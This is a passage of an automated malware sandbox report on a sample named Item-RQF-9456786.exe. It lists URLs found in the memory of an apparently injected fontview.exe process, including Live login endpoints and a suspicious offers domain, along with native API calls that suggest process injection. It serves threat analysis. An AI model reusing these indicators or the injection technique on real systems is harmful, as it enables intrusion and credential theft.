    Source: fontview.exe, 0000000A.00000003.2748653385.0000000008088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
    Source: fontview.exe, 0000000A.00000003.2748653385.0000000008088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
    Source: fontview.exe, 0000000A.00000003.2748653385.0000000008088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
    Source: fontview.exe, 0000000A.00000003.2748653385.0000000008088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
    Source: fontview.exe, 0000000A.00000002.4743802201.00000000067D6000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000003A96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000005CD8000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000002F98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://help.reg.ru/support/ssl-sertifikaty/1-etap-zakaz-ssl-sertifikata/kak-zakazat-besplatnyy-ssl-
    Source: fontview.exe, 0000000A.00000002.4743802201.00000000067D6000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000003A96000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://ik.imgkit.net/u1sv5cu4wfj/cribflyer-photos/tr:w-2000
    Source: fontview.exe, 0000000A.00000002.4740849571.00000000032CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
    Source: fontview.exe, 0000000A.00000002.4740849571.00000000032E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
    Source: fontview.exe, 0000000A.00000002.4740849571.00000000032CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2
    Source: fontview.exe, 0000000A.00000002.4740849571.00000000032CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
    Source: fontview.exe, 0000000A.00000002.4740849571.00000000032CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033%
    Source: fontview.exe, 0000000A.00000002.4740849571.00000000032CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
    Source: fontview.exe, 0000000A.00000002.4740849571.00000000032E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
    Source: fontview.exe, 0000000A.00000003.2743526885.0000000007FC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000006E1E000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.00000000040DE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lolipop.jp/
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000006E1E000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.00000000040DE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000005CD8000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000002F98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://parking.reg.ru/script/get_domain_data?domain_name=www.sklad-iq.online&rand=
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000006E1E000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.00000000040DE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://pepabo.com/
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000005CD8000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000002F98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://reg.ru
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000006E1E000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.00000000040DE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.minne.com/files/banner/minne_600x500
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000006E1E000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.00000000040DE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://support.lolipop.jp/hc/ja/articles/360049132953
    Source: fontview.exe, 0000000A.00000002.4743802201.00000000059B4000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000A.00000002.4745385758.0000000007C90000.00000004.00000800.00020000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000002C74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2853024183.000000000A014000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.domainnameshop.com/
    Source: firefox.exe, 0000000C.00000002.2853024183.000000000A014000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.domainnameshop.com/whois
    Source: fontview.exe, 0000000A.00000002.4743802201.00000000059B4000.00000004.10000000.00040000.00000000.sdmp, fontview.exe, 0000000A.00000002.4745385758.0000000007C90000.00000004.00000800.00020000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000002C74000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000C.00000002.2853024183.000000000A014000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.domeneshop.no/whois
    Source: fontview.exe, 0000000A.00000003.2748653385.0000000008088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
    Source: fontview.exe, 0000000A.00000003.2748653385.0000000008088000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000006C8C000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000003F4C000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.grandesofertas.fun/cu92/?2J=lsHwRlN9eHt1sCRZ6R6my3qo0uOsMlznhj79tynlIjZaDxATi7cI0dkl3mGb
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000005CD8000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000002F98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/dedicated/?utm_source=www.sklad-iq.online&utm_medium=parking&utm_campaign=s_land_
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000005CD8000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000002F98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/domain/new/?utm_source=www.sklad-iq.online&utm_medium=parking&utm_campaign=s_land
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000005CD8000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000002F98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/hosting/?utm_source=www.sklad-iq.online&utm_medium=parking&utm_campaign=s_land_ho
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000005CD8000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000002F98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/sozdanie-saita/
    Source: fontview.exe, 0000000A.00000002.4743802201.0000000005CD8000.00000004.10000000.00040000.00000000.sdmp, LiiDBuNLRIYu.exe, 0000000B.00000002.4742107600.0000000002F98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.reg.ru/whois/?check=&dname=www.sklad-iq.online&amp;reg_source=parking_auto
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_0042CBD3 NtClose,5_2_0042CBD3
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2B60 NtClose,LdrInitializeThunk,5_2_017E2B60
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2DF0 NtQuerySystemInformation,LdrInitializeThunk,5_2_017E2DF0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2C70 NtFreeVirtualMemory,LdrInitializeThunk,5_2_017E2C70
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E35C0 NtCreateMutant,LdrInitializeThunk,5_2_017E35C0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E4340 NtSetContextThread,5_2_017E4340
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E4650 NtSuspendThread,5_2_017E4650
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2BF0 NtAllocateVirtualMemory,5_2_017E2BF0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2BE0 NtQueryValueKey,5_2_017E2BE0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2BA0 NtEnumerateValueKey,5_2_017E2BA0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2B80 NtQueryInformationFile,5_2_017E2B80
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2AF0 NtWriteFile,5_2_017E2AF0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2AD0 NtReadFile,5_2_017E2AD0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2AB0 NtWaitForSingleObject,5_2_017E2AB0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2D30 NtUnmapViewOfSection,5_2_017E2D30
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2D10 NtMapViewOfSection,5_2_017E2D10
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2D00 NtSetInformationFile,5_2_017E2D00
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2DD0 NtDelayExecution,5_2_017E2DD0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2DB0 NtEnumerateKey,5_2_017E2DB0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2C60 NtCreateKey,5_2_017E2C60
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2C00 NtQueryInformationProcess,5_2_017E2C00
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2CF0 NtOpenProcess,5_2_017E2CF0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2CC0 NtQueryVirtualMemory,5_2_017E2CC0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2CA0 NtQueryInformationToken,5_2_017E2CA0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2F60 NtCreateProcessEx,5_2_017E2F60
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2F30 NtCreateSection,5_2_017E2F30
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2FE0 NtCreateFile,5_2_017E2FE0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2FB0 NtResumeThread,5_2_017E2FB0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2FA0 NtQuerySection,5_2_017E2FA0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2F90 NtProtectVirtualMemory,5_2_017E2F90
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2E30 NtWriteVirtualMemory,5_2_017E2E30
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2EE0 NtQueueApcThread,5_2_017E2EE0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2EA0 NtAdjustPrivilegesToken,5_2_017E2EA0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E2E80 NtReadVirtualMemory,5_2_017E2E80
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E3010 NtOpenDirectoryObject,5_2_017E3010
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E3090 NtSetValueKey,5_2_017E3090
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E39B0 NtGetContextThread,5_2_017E39B0
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E3D70 NtOpenThread,5_2_017E3D70
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: 5_2_017E3D10 NtOpenProcessToken,5_2_017E3D10
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_050135C0 NtCreateMutant,LdrInitializeThunk,10_2_050135C0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05014650 NtSuspendThread,LdrInitializeThunk,10_2_05014650
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05014340 NtSetContextThread,LdrInitializeThunk,10_2_05014340
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012D10 NtMapViewOfSection,LdrInitializeThunk,10_2_05012D10
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012D30 NtUnmapViewOfSection,LdrInitializeThunk,10_2_05012D30
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012DD0 NtDelayExecution,LdrInitializeThunk,10_2_05012DD0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012DF0 NtQuerySystemInformation,LdrInitializeThunk,10_2_05012DF0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012C60 NtCreateKey,LdrInitializeThunk,10_2_05012C60
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012C70 NtFreeVirtualMemory,LdrInitializeThunk,10_2_05012C70
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012CA0 NtQueryInformationToken,LdrInitializeThunk,10_2_05012CA0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012F30 NtCreateSection,LdrInitializeThunk,10_2_05012F30
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012FB0 NtResumeThread,LdrInitializeThunk,10_2_05012FB0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012FE0 NtCreateFile,LdrInitializeThunk,10_2_05012FE0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012E80 NtReadVirtualMemory,LdrInitializeThunk,10_2_05012E80
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012EE0 NtQueueApcThread,LdrInitializeThunk,10_2_05012EE0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_050139B0 NtGetContextThread,LdrInitializeThunk,10_2_050139B0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012B60 NtClose,LdrInitializeThunk,10_2_05012B60
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012BA0 NtEnumerateValueKey,LdrInitializeThunk,10_2_05012BA0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012BE0 NtQueryValueKey,LdrInitializeThunk,10_2_05012BE0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012BF0 NtAllocateVirtualMemory,LdrInitializeThunk,10_2_05012BF0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012AD0 NtReadFile,LdrInitializeThunk,10_2_05012AD0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012AF0 NtWriteFile,LdrInitializeThunk,10_2_05012AF0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05013010 NtOpenDirectoryObject,10_2_05013010
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05013090 NtSetValueKey,10_2_05013090
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012D00 NtSetInformationFile,10_2_05012D00
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05013D10 NtOpenProcessToken,10_2_05013D10
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05013D70 NtOpenThread,10_2_05013D70
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012DB0 NtEnumerateKey,10_2_05012DB0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012C00 NtQueryInformationProcess,10_2_05012C00
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012CC0 NtQueryVirtualMemory,10_2_05012CC0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012CF0 NtOpenProcess,10_2_05012CF0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012F60 NtCreateProcessEx,10_2_05012F60
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012F90 NtProtectVirtualMemory,10_2_05012F90
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012FA0 NtQuerySection,10_2_05012FA0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012E30 NtWriteVirtualMemory,10_2_05012E30
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012EA0 NtAdjustPrivilegesToken,10_2_05012EA0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012B80 NtQueryInformationFile,10_2_05012B80
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05012AB0 NtWaitForSingleObject,10_2_05012AB0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_03029300 NtCreateFile,10_2_03029300
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_03029770 NtAllocateVirtualMemory,10_2_03029770
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_03029600 NtClose,10_2_03029600
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_03029560 NtDeleteFile,10_2_03029560
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_03029470 NtReadFile,10_2_03029470
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0509F0E010_2_0509F0E0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FD010010_2_04FD0100
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0509132D10_2_0509132D
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FFB2C010_2_04FFB2C0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0509A35210_2_0509A352
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FE52A010_2_04FE52A0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0502739A10_2_0502739A
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_050A03E610_2_050A03E6
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FEE3F010_2_04FEE3F0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0508027410_2_05080274
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FCD34C10_2_04FCD34C
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_050812ED10_2_050812ED
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FD0CF210_2_04FD0CF2
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05091D5A10_2_05091D5A
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05097D7310_2_05097D73
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FE0C0010_2_04FE0C00
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FDADE010_2_04FDADE0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05059C3210_2_05059C32
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FFFDC010_2_04FFFDC0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FF8DBF10_2_04FF8DBF
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05080CB510_2_05080CB5
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FE3D4010_2_04FE3D40
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0509FCF210_2_0509FCF2
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FEAD0010_2_04FEAD00
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0509FF0910_2_0509FF09
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05022F2810_2_05022F28
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05000F3010_2_05000F30
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05054F4010_2_05054F40
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FE9EB010_2_04FE9EB0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FF2E9010_2_04FF2E90
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FE0E5910_2_04FE0E59
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0509FFB110_2_0509FFB1
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FECFE010_2_04FECFE0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0509EE2610_2_0509EE26
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FD2FC810_2_04FD2FC8
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FE1F9210_2_04FE1F92
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0509CE9310_2_0509CE93
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0509EEDB10_2_0509EEDB
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FE38E010_2_04FE38E0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FC68B810_2_04FC68B8
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_050AA9A610_2_050AA9A6
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FE284010_2_04FE2840
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FEA84010_2_04FEA840
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0504D80010_2_0504D800
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FE29A010_2_04FE29A0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FF696210_2_04FF6962
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FE995010_2_04FE9950
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FFB95010_2_04FFB950
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0500E8F010_2_0500E8F0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0509AB4010_2_0509AB40
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FDEA8010_2_04FDEA80
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0509FB7610_2_0509FB76
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05096BD710_2_05096BD7
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0501DBF910_2_0501DBF9
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0509FA4910_2_0509FA49
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05097A4610_2_05097A46
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05053A6C10_2_05053A6C
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04FFFB8010_2_04FFFB80
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_05025AA010_2_05025AA0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0507DAAC10_2_0507DAAC
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0508DAC610_2_0508DAC6
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_03011E4010_2_03011E40
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0300B12410_2_0300B124
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_030136BC10_2_030136BC
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_030136C010_2_030136C0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_030154B010_2_030154B0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0300CF6010_2_0300CF60
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0300AFE010_2_0300AFE0
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0300CD3710_2_0300CD37
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0300CD4010_2_0300CD40
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_0302BC4010_2_0302BC40
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04EBE66D10_2_04EBE66D
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04EBD73810_2_04EBD738
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04EBE2D810_2_04EBE2D8
    Source: C:\Windows\SysWOW64\fontview.exeCode function: 10_2_04EBC9F310_2_04EBC9F3
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeCode function: 11_2_04CE541D11_2_04CE541D
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeCode function: 11_2_04CEF7A911_2_04CEF7A9
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeCode function: 11_2_04D05F3911_2_04D05F39
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeCode function: 11_2_04CE703911_2_04CE7039
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeCode function: 11_2_04CE703011_2_04CE7030
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeCode function: 11_2_04CED9B911_2_04CED9B9
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeCode function: 11_2_04CED9B511_2_04CED9B5
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeCode function: 11_2_04CEC13911_2_04CEC139
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeCode function: 11_2_04CE52D911_2_04CE52D9
    Source: C:\Program Files (x86)\zbtoDJDOWcuVKPOeaueHkoNZCMlCoMtGKyvWbXEUYq\LiiDBuNLRIYu.exeCode function: 11_2_04CE725911_2_04CE7259
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: String function: 0179B970 appears 275 times
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: String function: 017E5130 appears 57 times
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: String function: 0182F290 appears 105 times
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: String function: 017F7E54 appears 101 times
    Source: C:\Users\user\Desktop\Item-RQF-9456786.exeCode function: String function: 0181EA12 appears 86 times
    Source: C:\Windows\SysWOW64\fontview.exeCode function: String function: 05015130 appears 36 times
    Source: C:\Windows\SysWOW64\fontview.exeCode function: String function: 0505F290 appears 105 times
    Source: C:\Windows\SysWOW64\fontview.exeCode function: String function: 04FCB970 appears 266 times
    Source: C:\Windows\SysWOW64\fontview.exeCode function: String function: 0504EA12 appears 84 times
    Source: C:\Windows\SysWOW64\fontview.exeCode function: String function: 05027E54 appears 88 times
    Source: Item-RQF-9456786.exe, 00000000.00000002.2271370211.0000000002A15000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameArthur.dll" vs Item-RQF-9456786.exe
